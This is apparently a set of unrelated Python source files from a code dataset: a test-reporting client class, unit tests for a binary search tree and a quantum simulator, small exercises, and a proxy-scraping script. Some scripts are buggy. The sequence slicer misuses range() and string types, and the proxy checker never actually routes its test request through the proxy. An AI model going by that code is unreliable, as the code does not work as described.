launch_uuid: Parent launch UUID\n :param generated_id: Id generated to speed up client\n \"\"\"\n self.uuid = None\n self.weight = None\n self.generated_id = generated_id\n self.http_requests = []\n self.responses = []\n self.rp_url = rp_url\n self.session = session\n self.project_name = project_name\n self.launch_uuid = launch_uuid\n\n @property\n def http_request(self):\n \"\"\"Get last http request.\n\n :return: request object\n \"\"\"\n return self.http_requests[-1] if self.http_requests else None\n\n def add_request(self, endpoint, method, request_class, *args, **kwargs):\n \"\"\"Add new request object.\n\n :param endpoint: request endpoint\n :param method: Session object method. Allowable values: get,\n post, put, delete\n :param request_class: request class object\n :param args: request object attributes\n :param kwargs: request object named attributes\n :return: None\n \"\"\"\n rp_request = request_class(*args, **kwargs)\n rp_request.http_request = HttpRequest(method, endpoint)\n rp_request.priority = self.weight\n self.http_requests.append(rp_request)\n","sub_path":"reportportal_client/items/rp_base_item.py","file_name":"rp_base_item.py","file_ext":"py","file_size_in_byte":2396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"620712781","text":"from BinarySearchTree import *\nimport unittest\n\nclass BinarySearchTreeTest(unittest.TestCase):\n def setUp(self):\n self.binaryTree = BinarySearchTree()\n self.binaryTree.addValue(8)\n self.binaryTree.addValue(3)\n self.binaryTree.addValue(10)\n self.binaryTree.addValue(6)\n self.binaryTree.addValue(1)\n self.binaryTree.addValue(4)\n self.binaryTree.addValue(14)\n self.binaryTree.addValue(7)\n self.binaryTree.addValue(13)\n\n def tearDown(self):\n del self.binaryTree\n\n def test_treeGen(self):\n binaryTree = BinarySearchTree()\n binaryTree.addValue(1000)\n self.assertEqual(1000, binaryTree.root.getValue())\n\n def test_addNode(self):\n binaryTree = BinarySearchTree()\n binaryTree.addValue(1000)\n binaryTree.addValue(-10)\n self.assertEqual(-10, binaryTree.root.lchild.value)\n\n def test_addSameNode(self):\n try:\n self.binaryTree.addValue(8)\n except AlreadyExistingValue:\n self.assert_\n\n def test_binarySearch(self):\n node10 = self.binaryTree.binarySearch(10)\n self.assertEqual(10, node10.value)\n\n def test_nodeNotFound(self):\n try:\n invalidNode = self.binaryTree.binarySearch(-777)\n except NodeNotFound:\n self.assert_\n\n def test_inOrderTraverse(self):\n answer = [1, 3, 4, 6, 7, 8, 10, 13, 14]\n inOrderTraverseList = []\n for node in self.binaryTree.inOrderTraverse():\n inOrderTraverseList.append(node.value)\n self.assertEqual(answer, inOrderTraverseList)\n\n def test_preOrderTraverse(self):\n answer = [8, 3, 1, 6, 4, 7, 10, 14, 13]\n preOrderTraverseList = []\n for node in self.binaryTree.preOrderTraverse():\n preOrderTraverseList.append(node.value)\n self.assertEqual(answer, preOrderTraverseList)\n\n def test_postOrderTraverse(self):\n answer = [1, 4, 7, 6, 3, 13, 14, 10, 8]\n postOrderTraverseList = []\n for node in self.binaryTree.postOrderTraverse():\n postOrderTraverseList.append(node.value)\n self.assertEqual(answer, postOrderTraverseList)\n\n\nif __name__ == \"__main__\":\n unittest.main()","sub_path":"Data-Structure/data-Structure_python/BinarySearchTreeTest.py","file_name":"BinarySearchTreeTest.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"296526072","text":"# better use regular expressions!!\n# import re\n\n# def solve_runes(runes):\n# for d in sorted(set(\"0123456789\") - set(runes)):\n# toTest = runes.replace(\"?\",d)\n# if re.search(r'([^\\d]|\\b)0\\d+', toTest): continue\n# l,r = toTest.split(\"=\")\n# if eval(l) == eval(r): return int(d)\n# return -1\n\ndef solve_runes(runes):\n leftDigits = [str(i) for i in range(10)]\n operatorSign = None\n for i in range(1,len(runes)):\n if runes[i].isdigit():\n if runes[i] in leftDigits:\n leftDigits.remove(runes[i])\n if runes[i] == '+':\n operatorSign = '+'\n index1 = i\n if runes[i] == '-':\n if not operatorSign:\n operatorSign = '-'\n index1 = i\n if runes[i] == '*':\n operatorSign = '*'\n index1 = i\n if runes[i] == '=':\n index2 = i\n print(index1, index2, operatorSign)\n if '0' in leftDigits:\n if (runes[0:2] == '-?' and index1 > 2) or \\\n (runes[index1+1:index1+3] == '-?' and index2 - index1 > 2) or \\\n (runes[index2+1:index2+3] == '-?' and len(runes)-1 - index2 > 2) or \\\n (runes[0] == '?' and index1 > 1) or \\\n (runes[index1+1] == '?' and index2 - index1 > 2) or \\\n (runes[index2+1] == '?' and len(runes)-1 - index2 > 1):\n print(\"0 removed\")\n leftDigits.remove('0')\n\n firstNumber = ''.join(runes[:index1])\n secondNumber = ''.join(runes[index1+1:index2])\n thirdNumber = ''.join(runes[index2+1:])\n\n for n in leftDigits:\n fN = int(firstNumber.replace('?', n))\n sN = int(secondNumber.replace('?', n))\n tN = int(thirdNumber.replace('?', n))\n if operatorSign == '+':\n if fN + sN == tN:\n return int(n)\n if operatorSign == '-':\n if fN - sN == tN:\n return int(n)\n if operatorSign == '*':\n if fN * sN == tN:\n return int(n)\n \n return -1\n\ntestStr = \"123?45*?=?\"\nprint(testStr, solve_runes(testStr))","sub_path":"solveRune.py","file_name":"solveRune.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"507998998","text":"def handleError(message):\n print(message)\n prompt()\n\n\ndef extractNumber(phone):\n countryCode = phone[0:3]\n gsmCode = phone[3:5]\n phoneNumber = phone[5:12]\n print(\"You entered: \" + phone + \"\\n\")\n print(\"The country code: \" + countryCode + \"\\n\")\n print(\"The GSM code: \" + gsmCode + \"\\n\")\n print(\"The number: \" + phoneNumber + \"\\n\")\n print('Phone number is: \\n ( {countryCode} ) {gsmCode} - {phoneNumber}'.format(countryCode=countryCode,\n gsmCode=gsmCode,\n phoneNumber=phoneNumber))\n\n\ndef prompt():\n phone = input(\"Please input your number, including the country code, without leading zeros. Enter 0 to exit. \\n\")\n if phone == \"0\":\n print(\"Bye!\")\n exit()\n if not phone.isnumeric():\n return handleError(\"Phone number is invalid\")\n if not len(phone) == 12:\n return handleError(\"Phone number is invalid\")\n return extractNumber(phone)\n\n\nprompt()\n","sub_path":"gsmCode.py","file_name":"gsmCode.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"476690645","text":"import pytest\nfrom appium import webdriver\n\n@pytest.fixture(autouse=True)\ndef open_app():\n desired_caps = {\n 'platformName': 'android',\n 'platformVersion': '5.1.1',\n 'deviceName': '127.0.0.1:21503',\n 'appPackage': 'com.tpshop.malls',\n 'appActivity': '.SPMainActivity',\n 'resetKeyboard': True,\n 'unicodeKeyboard': True,\n 'noReset': True\n }\n driver = webdriver.Remote('http://127.0.0.1:4723/wd/hub', desired_caps)\n return driver\n\n\n\n","sub_path":"conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"118655106","text":"# This code will call a data_seq and slice it using num_of_slices and\n# bp_per_slice. Script will take the inputs and return num_of_slices outputs,\n# each with a string length of bp_per_slice.\n\n# The below code might be useful for future stuff.\n# from Bio import SeqIO\n# from Bio.Seq import Seq\n# for seq_record in SeqIO.parse('c_elegans.PRJNA275000.WS267.genomic.fa', 'fasta'):\n\nimport numpy as np\n\nprint(\"Welcome to slice sim!\")\n\n# Create empty string and bytearray for original sequence.\ndata_seq = ()\ndata_seq_ba = bytearray(data_seq, \"utf-8\")\n\n# Create empty string and an empty list for the original sequence data.\ndata_seq = ''\nlist_lines = []\n\n# If the data is too large, the following bytearray could be an option. data_seq_ba = bytearray(data_seq, \"utf-8\")\n\n# Open file, skip any lines starting with '>', remove end formatting, and append the lines to the list of lines.\nwith open('test_fa.txt', 'r') as file1:\n for line in file1.readlines():\n if \">\" in line:\n continue\n else:\n line=line.strip(\"\\n\")\n list_lines.append(line)\n\n# Fill the empty string by joining the list of lines with an empty \"\" separator.\ndata_seq=\"\".join(list_lines)\n\n# The below code was my first attempt, which James Johnson helped me fix to the code seen above.\n#with open('c_elegans.PRJNA275000.WS267.genomic.fa', 'r') as file1:\n# for i, line in enumerate(file1):\n# if i == 0 or not line.startswith('>'):\n# for line in file1:\n# line.strip('\\n')\n# data_seq.join()\n# data_seq_ba.extend()\n\n# Assign variables to user inputs and confirm with a print statement.\nprint(\"Please input a numeric value for the following questions.\")\nnum_of_slices = input(\"How many slices? \")\nbp_per_slice = input(\"How many bp per slice? \")\nprint(\"You have chosen to pick %s slices %s bp in length.\" % (num_of_slices, bp_per_slice))\n\n# Find length of the sequence\ndata_length = len(data_seq)\n\n# Import random package, make empty lists, identify a random number of slice starting positions within the length of the original sequence, identify the starting positions' related end positions for the given slice length.\nimport random\nslice_pos_start = []\nfor x in range(num_of_slices):\n\tslice_pos_start.append(random.randint(1, data_length - bp_per_slice))\nslice_pos_end = []\nfor x in range(slice_pos_start):\n slice_pos_end.append(slice_pos_start + bp_per_slice + 1)\n\n# Create empty dictionary. Keys are the slice_position list. Values are the slice from data_seq.\nslice_dict = {}\nfor x in range(slice_pos_start):\n\tslice_dict[x] = data_seq[slice_pos_start:slice_pos_end]\n\n# Create an empty string for the mutated sequence\ndata_seq_mut = ''\n\n# Define a new function called mutate. This code only looks at transitions, not transversions. Maybe I can use this in the future. prob_* is the probability of the listed transition given as a float where 1.0 is 100%.\ndef mutate(sequence, prob_AtoG, prob_GtoA, prob_CtoT, prob_TtoC):\n for i, char in enumerate(sequence):\n if char == \"A\":\n if random.uniform(0.0, 1.0) < prob_AtoG:\n sequence[i] = \"G\"\n elif char == \"C\":\n if random.uniform(0.0, 1.0) < prob_CtoT:\n sequence[i] = \"T\"\n elif char == \"G\":\n if random.uniform(0.0, 1.0) < prob_GtoA:\n sequence[i] = \"A\"\n elif char == \"T\":\n if random.uniform(0.0, 1.0) < prob_TtoC:\n sequence[i] = \"C\"\n else:\n continue\n\n# Make random mutations at random positions of data_seq and fill data_seq_mut\ndata_seq_mut = mutate(data_seq, 0.0001, 0.0001, 0.0001, 0.0001)\n\n# Import random package, make empty lists, identify a random number of slice starting positions within the length of the original sequence, identify the starting positions' related end positions for the given slice length.\nimport random\nmut_slice_pos_start = []\nfor x in range(num_of_slices):\n\tmut_slice_pos_start.append(random.randint(1, data_length - bp_per_slice))\nmut_slice_pos_end = []\nfor x in range(mut_slice_pos_start):\n mut_slice_pos_end.append(mut_slice_pos_start + bp_per_slice + 1)\n\n# Create empty dictionary. Keys are the slice_position list. Values are the slice from data_seq.\nmut_slice_dict = {}\nfor x in range(mut_slice_pos_start):\n\tmut_slice_dict[x] = data_seq_mut[mut_slice_pos_start:mut_slice_pos_end]\n\n# Output files\nwith open(\"mutated_sequence.txt\", 'w') as output_file1:\n output_file1.write(data_seq_mut)\nwith open(\"slices_original.txt\", 'w') as output_file2:\n output_file2.write(slice_dict)\nwith open(\"slices_mutated.txt\", 'w') as output_file3:\n output_file3.write(mut_slice_dict)","sub_path":"slicer_sim_test.py","file_name":"slicer_sim_test.py","file_ext":"py","file_size_in_byte":4562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"343405209","text":"# Copyright 2019-2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"). You\n# may not use this file except in compliance with the License. A copy of\n# the License is located at\n#\n# http://aws.amazon.com/apache2.0/\n#\n# or in the \"license\" file accompanying this file. This file is\n# distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF\n# ANY KIND, either express or implied. See the License for the specific\n# language governing permissions and limitations under the License.\n\nimport cmath\nimport json\nimport sys\nfrom collections import Counter, namedtuple\n\nimport numpy as np\nimport pytest\n\nfrom braket.default_simulator import gate_operations, observables\nfrom braket.default_simulator.result_types import Expectation, Variance\nfrom braket.default_simulator.simulator import DefaultSimulator\nfrom braket.device_schema.simulators import (\n GateModelSimulatorDeviceCapabilities,\n GateModelSimulatorDeviceParameters,\n)\nfrom braket.ir.jaqcd import Program\nfrom braket.simulator import BraketSimulator\nfrom braket.task_result import AdditionalMetadata, ResultTypeValue, TaskMetadata\n\nCircuitData = namedtuple(\"CircuitData\", \"circuit_ir probability_zero\")\n\n\n@pytest.fixture\ndef grcs_16_qubit():\n with open(\"test/resources/grcs_16.json\") as circuit_file:\n data = json.load(circuit_file)\n return CircuitData(Program.parse_raw(json.dumps(data[\"ir\"])), data[\"probability_zero\"])\n\n\n@pytest.fixture\ndef bell_ir():\n return Program.parse_raw(\n json.dumps(\n {\n \"instructions\": [\n {\"type\": \"h\", \"target\": 0},\n {\"type\": \"cnot\", \"target\": 1, \"control\": 0},\n ]\n }\n )\n )\n\n\n@pytest.fixture\ndef bell_ir_with_result():\n def _bell_ir_with_result(targets=None):\n return Program.parse_raw(\n json.dumps(\n {\n \"instructions\": [\n {\"type\": \"h\", \"target\": 0},\n {\"type\": \"cnot\", \"target\": 1, \"control\": 0},\n ],\n \"results\": [\n {\"type\": \"amplitude\", \"states\": [\"11\"]},\n {\"type\": \"expectation\", \"observable\": [\"x\"], \"targets\": targets},\n ],\n }\n )\n )\n\n return _bell_ir_with_result\n\n\n@pytest.mark.parametrize(\"batch_size\", [1, 5, 10])\ndef test_simulator_run_grcs_16(grcs_16_qubit, batch_size):\n simulator = DefaultSimulator()\n result = simulator.run(grcs_16_qubit.circuit_ir, qubit_count=16, shots=0, batch_size=batch_size)\n state_vector = result.resultTypes[0].value\n assert cmath.isclose(abs(state_vector[0]) ** 2, grcs_16_qubit.probability_zero, abs_tol=1e-7)\n\n\n@pytest.mark.parametrize(\"batch_size\", [1, 5, 10])\ndef test_simulator_run_bell_pair(bell_ir, batch_size):\n simulator = DefaultSimulator()\n shots_count = 10000\n result = simulator.run(bell_ir, qubit_count=2, shots=shots_count, batch_size=batch_size)\n\n assert all([len(measurement) == 2] for measurement in result.measurements)\n assert len(result.measurements) == shots_count\n counter = Counter([\"\".join(measurement) for measurement in result.measurements])\n assert counter.keys() == {\"00\", \"11\"}\n assert 0.4 < counter[\"00\"] / (counter[\"00\"] + counter[\"11\"]) < 0.6\n assert 0.4 < counter[\"11\"] / (counter[\"00\"] + counter[\"11\"]) < 0.6\n assert result.taskMetadata == TaskMetadata(\n id=result.taskMetadata.id, deviceId=DefaultSimulator.DEVICE_ID, shots=shots_count\n )\n assert result.additionalMetadata == AdditionalMetadata(action=bell_ir)\n\n\ndef test_simulator_identity():\n simulator = DefaultSimulator()\n shots_count = 1000\n result = simulator.run(\n Program.parse_raw(\n json.dumps({\"instructions\": [{\"type\": \"i\", \"target\": 0}, {\"type\": \"i\", \"target\": 1}]})\n ),\n qubit_count=2,\n shots=shots_count,\n )\n counter = Counter([\"\".join(measurement) for measurement in result.measurements])\n assert counter.keys() == {\"00\"}\n assert counter[\"00\"] == shots_count\n\n\n@pytest.mark.xfail(raises=ValueError)\ndef test_simulator_run_no_results_no_shots(bell_ir):\n simulator = DefaultSimulator()\n simulator.run(bell_ir, qubit_count=2, shots=0)\n\n\n@pytest.mark.xfail(raises=ValueError)\ndef test_simulator_run_amplitude_shots():\n simulator = DefaultSimulator()\n ir = Program.parse_raw(\n json.dumps(\n {\n \"instructions\": [{\"type\": \"h\", \"target\": 0}],\n \"results\": [{\"type\": \"amplitude\", \"states\": [\"00\"]}],\n }\n )\n )\n simulator.run(ir, qubit_count=2, shots=100)\n\n\n@pytest.mark.xfail(raises=ValueError)\ndef test_simulator_run_amplitude_no_shots_invalid_states():\n simulator = DefaultSimulator()\n ir = Program.parse_raw(\n json.dumps(\n {\n \"instructions\": [{\"type\": \"h\", \"target\": 0}],\n \"results\": [{\"type\": \"amplitude\", \"states\": [\"0\"]}],\n }\n )\n )\n simulator.run(ir, qubit_count=2, shots=0)\n\n\n@pytest.mark.xfail(raises=ValueError)\ndef test_simulator_run_statevector_shots():\n simulator = DefaultSimulator()\n ir = Program.parse_raw(\n json.dumps(\n {\"instructions\": [{\"type\": \"h\", \"target\": 0}], \"results\": [{\"type\": \"statevector\"}]}\n )\n )\n simulator.run(ir, qubit_count=2, shots=100)\n\n\ndef test_simulator_run_result_types_shots():\n simulator = DefaultSimulator()\n ir = Program.parse_raw(\n json.dumps(\n {\n \"instructions\": [\n {\"type\": \"h\", \"target\": 0},\n {\"type\": \"cnot\", \"target\": 1, \"control\": 0},\n ],\n \"results\": [{\"type\": \"expectation\", \"observable\": [\"z\"], \"targets\": [1]}],\n }\n )\n )\n shots_count = 100\n result = simulator.run(ir, qubit_count=2, shots=shots_count)\n assert all([len(measurement) == 2] for measurement in result.measurements)\n assert len(result.measurements) == shots_count\n assert result.measuredQubits == [0, 1]\n assert not result.resultTypes\n\n\ndef test_simulator_run_result_types_shots_basis_rotation_gates():\n simulator = DefaultSimulator()\n ir = Program.parse_raw(\n json.dumps(\n {\n \"instructions\": [\n {\"type\": \"h\", \"target\": 0},\n {\"type\": \"cnot\", \"target\": 1, \"control\": 0},\n ],\n \"basis_rotation_instructions\": [{\"type\": \"h\", \"target\": 1}],\n \"results\": [{\"type\": \"expectation\", \"observable\": [\"x\"], \"targets\": [1]}],\n }\n )\n )\n shots_count = 1000\n result = simulator.run(ir, qubit_count=2, shots=shots_count)\n assert all([len(measurement) == 2] for measurement in result.measurements)\n assert len(result.measurements) == shots_count\n assert not result.resultTypes\n assert result.measuredQubits == [0, 1]\n\n\n@pytest.mark.xfail(raises=ValueError)\ndef test_simulator_run_result_types_shots_basis_rotation_gates_value_error():\n simulator = DefaultSimulator()\n ir = Program.parse_raw(\n json.dumps(\n {\n \"instructions\": [\n {\"type\": \"h\", \"target\": 0},\n {\"type\": \"cnot\", \"target\": 1, \"control\": 0},\n ],\n \"basis_rotation_instructions\": [{\"type\": \"foo\", \"target\": 1}],\n \"results\": [{\"type\": \"expectation\", \"observable\": [\"x\"], \"targets\": [1]}],\n }\n )\n )\n shots_count = 1000\n simulator.run(ir, qubit_count=2, shots=shots_count)\n\n\n@pytest.mark.parametrize(\n \"ir, qubit_count\",\n [\n (\n Program.parse_raw(\n json.dumps(\n {\n \"instructions\": [{\"type\": \"z\", \"target\": 2}],\n \"basis_rotation_instructions\": [],\n \"results\": [],\n }\n )\n ),\n 1,\n ),\n (\n Program.parse_raw(\n json.dumps(\n {\n \"instructions\": [{\"type\": \"h\", \"target\": 0}],\n \"basis_rotation_instructions\": [{\"type\": \"z\", \"target\": 3}],\n \"results\": [],\n }\n )\n ),\n 2,\n ),\n ],\n)\n@pytest.mark.xfail(raises=ValueError)\ndef test_simulator_run_non_contiguous_qubits(ir, qubit_count):\n simulator = DefaultSimulator()\n shots_count = 1000\n simulator.run(ir, qubit_count=qubit_count, shots=shots_count)\n\n\n@pytest.mark.parametrize(\n \"ir, qubit_count\",\n [\n (\n Program.parse_raw(\n json.dumps(\n {\n \"results\": [{\"targets\": [2], \"type\": \"expectation\", \"observable\": [\"z\"]}],\n \"basis_rotation_instructions\": [],\n \"instructions\": [{\"type\": \"z\", \"target\": 0}],\n }\n )\n ),\n 1,\n ),\n (\n Program.parse_raw(\n json.dumps(\n {\n \"results\": [{\"targets\": [2], \"type\": \"expectation\", \"observable\": [\"z\"]}],\n \"basis_rotation_instructions\": [],\n \"instructions\": [{\"type\": \"z\", \"target\": 0}, {\"type\": \"z\", \"target\": 1}],\n }\n )\n ),\n 2,\n ),\n ],\n)\n@pytest.mark.xfail(raises=ValueError)\ndef test_simulator_run_observable_references_invalid_qubit(ir, qubit_count):\n simulator = DefaultSimulator()\n shots_count = 0\n simulator.run(ir, qubit_count=qubit_count, shots=shots_count)\n\n\n@pytest.mark.parametrize(\"batch_size\", [1, 5, 10])\n@pytest.mark.parametrize(\"targets\", [(None), ([1]), ([0])])\ndef test_simulator_bell_pair_result_types(bell_ir_with_result, targets, batch_size):\n simulator = DefaultSimulator()\n ir = bell_ir_with_result(targets)\n result = simulator.run(ir, qubit_count=2, shots=0, batch_size=batch_size)\n assert len(result.resultTypes) == 2\n assert result.resultTypes[0] == ResultTypeValue.construct(\n type=ir.results[0], value={\"11\": complex(1 / 2 ** 0.5)}\n )\n assert result.resultTypes[1] == ResultTypeValue.construct(\n type=ir.results[1], value=(0 if targets else [0, 0])\n )\n assert result.taskMetadata == TaskMetadata(\n id=result.taskMetadata.id, deviceId=DefaultSimulator.DEVICE_ID, shots=0\n )\n assert result.additionalMetadata == AdditionalMetadata(action=ir)\n\n\n@pytest.mark.xfail(raises=ValueError)\ndef test_simulator_fails_samples_0_shots():\n simulator = DefaultSimulator()\n prog = Program.parse_raw(\n json.dumps(\n {\n \"instructions\": [{\"type\": \"h\", \"target\": 0}],\n \"results\": [{\"type\": \"sample\", \"observable\": [\"x\"], \"targets\": [0]}],\n }\n )\n )\n simulator.run(prog, qubit_count=1, shots=0)\n\n\n@pytest.mark.parametrize(\n \"result_types,expected_expectation,expected_variance\",\n [\n (\n [\n {\"type\": \"expectation\", \"observable\": [\"x\"], \"targets\": [1]},\n {\"type\": \"variance\", \"observable\": [\"x\"], \"targets\": [1]},\n ],\n 0,\n 1,\n ),\n (\n [\n {\"type\": \"expectation\", \"observable\": [\"x\"]},\n {\"type\": \"variance\", \"observable\": [\"x\"], \"targets\": [1]},\n ],\n [0, 0],\n 1,\n ),\n (\n [\n {\n \"type\": \"expectation\",\n \"observable\": [[[[0, 0], [1, 0]], [[1, 0], [0, 0]]]],\n \"targets\": [1],\n },\n {\n \"type\": \"variance\",\n \"observable\": [[[[0, 0], [1, 0]], [[1, 0], [0, 0]]]],\n \"targets\": [1],\n },\n ],\n 0,\n 1,\n ),\n (\n [\n {\n \"type\": \"expectation\",\n \"observable\": [\"x\", [[[0, 0], [1, 0]], [[1, 0], [0, 0]]]],\n \"targets\": [0, 1],\n },\n {\n \"type\": \"expectation\",\n \"observable\": [\"x\", [[[0, 0], [1, 0]], [[1, 0], [0, 0]]]],\n \"targets\": [0, 1],\n },\n ],\n 1,\n 1,\n ),\n ],\n)\ndef test_simulator_accepts_overlapping_targets_same_observable(\n result_types, expected_expectation, expected_variance\n):\n simulator = DefaultSimulator()\n prog = Program.parse_raw(\n json.dumps(\n {\n \"instructions\": [\n {\"type\": \"h\", \"target\": 0},\n {\"type\": \"cnot\", \"target\": 1, \"control\": 0},\n ],\n \"results\": result_types,\n }\n )\n )\n result = simulator.run(prog, qubit_count=2, shots=0)\n expectation = result.resultTypes[0].value\n variance = result.resultTypes[1].value\n assert np.allclose(expectation, expected_expectation)\n assert np.allclose(variance, expected_variance)\n\n\n@pytest.mark.xfail(raises=ValueError)\n@pytest.mark.parametrize(\n \"result_types\",\n [\n (\n [\n {\"type\": \"expectation\", \"observable\": [\"y\"]},\n {\"type\": \"variance\", \"observable\": [\"x\"], \"targets\": [1]},\n ]\n ),\n (\n [\n {\"type\": \"expectation\", \"observable\": [\"y\"], \"targets\": [1]},\n {\"type\": \"variance\", \"observable\": [\"x\"], \"targets\": [1]},\n ]\n ),\n (\n [\n {\n \"type\": \"expectation\",\n \"observable\": [[[[0, 0], [1, 0]], [[1, 0], [0, 0]]]],\n \"targets\": [1],\n },\n {\n \"type\": \"variance\",\n \"observable\": [[[[1, 0], [0, 0]], [[0, 0], [1, 0]]]],\n \"targets\": [1],\n },\n ]\n ),\n (\n [\n {\n \"type\": \"expectation\",\n \"observable\": [\"x\", [[[0, 0], [1, 0]], [[1, 0], [0, 0]]]],\n \"targets\": [0, 1],\n },\n {\"type\": \"variance\", \"observable\": [\"y\", \"x\"], \"targets\": [0, 1]},\n ]\n ),\n (\n [\n {\"type\": \"expectation\", \"observable\": [\"i\"]},\n {\"type\": \"variance\", \"observable\": [\"y\"]},\n ]\n ),\n ],\n)\ndef test_simulator_fails_overlapping_targets_different_observable(result_types):\n simulator = DefaultSimulator()\n prog = Program.parse_raw(\n json.dumps(\n {\n \"instructions\": [\n {\"type\": \"h\", \"target\": 0},\n {\"type\": \"cnot\", \"target\": 1, \"control\": 0},\n ],\n \"results\": result_types,\n }\n )\n )\n simulator.run(prog, qubit_count=2, shots=0)\n\n\n@pytest.mark.parametrize(\n \"obs1,obs2\",\n [\n (observables.PauliX([1]), observables.PauliX(None)),\n (observables.PauliZ([1]), observables.PauliZ(None)),\n (observables.Hermitian(np.eye(2), [1]), observables.Hermitian(np.eye(2), None)),\n ],\n)\ndef test_validate_and_consolidate_observable_result_types_none(obs1, obs2):\n obs_rts = [\n Expectation(obs1),\n Variance(obs2),\n ]\n actual_obs = DefaultSimulator._validate_and_consolidate_observable_result_types(obs_rts, 2)\n assert len(actual_obs) == 1\n assert actual_obs[0].measured_qubits is None\n\n\n@pytest.mark.parametrize(\n \"obs\",\n [(observables.PauliX([1])), (observables.PauliZ([1])), (observables.Hermitian(np.eye(2), [1]))],\n)\ndef test_validate_and_consolidate_observable_result_types_same_target(obs):\n obs_rts = [\n Expectation(obs),\n Variance(obs),\n ]\n actual_obs = DefaultSimulator._validate_and_consolidate_observable_result_types(obs_rts, 2)\n assert len(actual_obs) == 1\n assert actual_obs[0].measured_qubits == (1,)\n\n\ndef test_validate_and_consolidate_observable_result_types_tensor_product():\n obs_rts = [\n Expectation(observables.TensorProduct([observables.PauliX([0]), observables.PauliY([1])])),\n Variance(observables.TensorProduct([observables.PauliX([0]), observables.PauliY([1])])),\n Expectation(observables.TensorProduct([observables.PauliX([2]), observables.PauliY([3])])),\n ]\n actual_obs = DefaultSimulator._validate_and_consolidate_observable_result_types(obs_rts, 4)\n assert len(actual_obs) == 2\n assert actual_obs[0].measured_qubits == (0, 1,)\n assert actual_obs[1].measured_qubits == (2, 3,)\n\n\n@pytest.mark.parametrize(\n \"obs1,obs2\",\n [\n (observables.PauliX([1]), observables.PauliX([2])),\n (observables.PauliZ([1]), observables.PauliZ([2])),\n (observables.Hermitian(np.eye(2), [1]), observables.Hermitian(np.eye(2), [2])),\n ],\n)\ndef test_validate_and_consolidate_observable_result_types_targets(obs1, obs2):\n obs_rts = [\n Expectation(obs1),\n Expectation(obs2),\n ]\n actual_obs = DefaultSimulator._validate_and_consolidate_observable_result_types(obs_rts, 3)\n assert len(actual_obs) == 2\n assert actual_obs[0].measured_qubits == (1,)\n assert actual_obs[1].measured_qubits == (2,)\n\n\ndef test_default_simulator_instance_braket_simulator():\n assert isinstance(DefaultSimulator(), BraketSimulator)\n\n\ndef test_properties():\n simulator = DefaultSimulator()\n observables = [\"X\", \"Y\", \"Z\", \"H\", \"I\", \"Hermitian\"]\n max_shots = sys.maxsize\n qubit_count = 26\n expected_properties = GateModelSimulatorDeviceCapabilities.parse_obj(\n {\n \"service\": {\n \"executionWindows\": [\n {\n \"executionDay\": \"Everyday\",\n \"windowStartHour\": \"00:00\",\n \"windowEndHour\": \"23:59:59\",\n }\n ],\n \"shotsRange\": [0, max_shots],\n },\n \"action\": {\n \"braket.ir.jaqcd.program\": {\n \"actionType\": \"braket.ir.jaqcd.program\",\n \"version\": [\"1\"],\n \"supportedOperations\": sorted(\n [\n instruction.__name__\n for instruction in gate_operations._from_braket_instruction.registry\n if type(instruction) is not type\n ]\n ),\n \"supportedResultTypes\": [\n {\n \"name\": \"Sample\",\n \"observables\": observables,\n \"minShots\": 1,\n \"maxShots\": max_shots,\n },\n {\n \"name\": \"Expectation\",\n \"observables\": observables,\n \"minShots\": 0,\n \"maxShots\": max_shots,\n },\n {\n \"name\": \"Variance\",\n \"observables\": observables,\n \"minShots\": 0,\n \"maxShots\": max_shots,\n },\n {\"name\": \"Probability\", \"minShots\": 0, \"maxShots\": max_shots},\n {\"name\": \"StateVector\", \"minShots\": 0, \"maxShots\": 0},\n {\"name\": \"Amplitude\", \"minShots\": 0, \"maxShots\": 0},\n ],\n }\n },\n \"paradigm\": {\"qubitCount\": qubit_count},\n \"deviceParameters\": GateModelSimulatorDeviceParameters.schema(),\n }\n )\n assert simulator.properties == expected_properties\n","sub_path":"test/unit_tests/braket/default_simulator/test_simulator.py","file_name":"test_simulator.py","file_ext":"py","file_size_in_byte":19999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"565534433","text":"# coding: utf-8\n'''\n从http://www.xicidaili.com/nn/获取可用代理ip\n'''\n\nimport requests\nimport codecs\nfrom lxml import etree\nimport sqlite3, time\nimport argparse\n\n\nclass getProxy():\n def __init__(self):\n self.user_agent = 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36'\n self.header = {'User-Agent': self.user_agent}\n self.db = 'proxy.db'\n self.now = time.strftime(\"%Y-%m-%d %H:%M:%S\")\n\n def get_html(self, num):\n url = 'http://www.xicidaili.com/nn/' + str(num)\n rep = requests.get(url, headers=self.header).content\n soup = etree.HTML(rep)\n ipList = soup.xpath('//tr/td[2]/text()')\n portList = soup.xpath('//tr/td[3]/text()')\n\n for ip, port in zip(ipList, portList):\n if self.isAlive(ip, port):\n self.insert_db(ip, port, self.now)\n\n def isAlive(self, ip, port):\n proxy={\"http\": '%s:%s' % (ip, port)}\n \n #挑选出代理延迟小于10\n try:\n rep = requests.get('https://www.baidu.com/',timeout=10)\n except requests.exceptions.ReadTimeout:\n print(\"%s timeout >10s\" % ip)\n return False\n\n if rep.status_code==200:\n print(\"%s work\" % ip)\n # print(rep.content)\n return True\n else:\n print(\"%s not work\" % ip)\n return False \n\n def insert_db(self, ip, port, time):\n db = self.db.split('.')[0]\n try:\n conn = sqlite3.connect(self.db)\n except:\n print('error to open database %s' % db)\n # 建立ip和port的复合主键\n creat_tb ='''\n create table if not exists %s\n (ip text,\n port text,\n date text,\n CONSTRAINT ip_port PRIMARY KEY (ip, 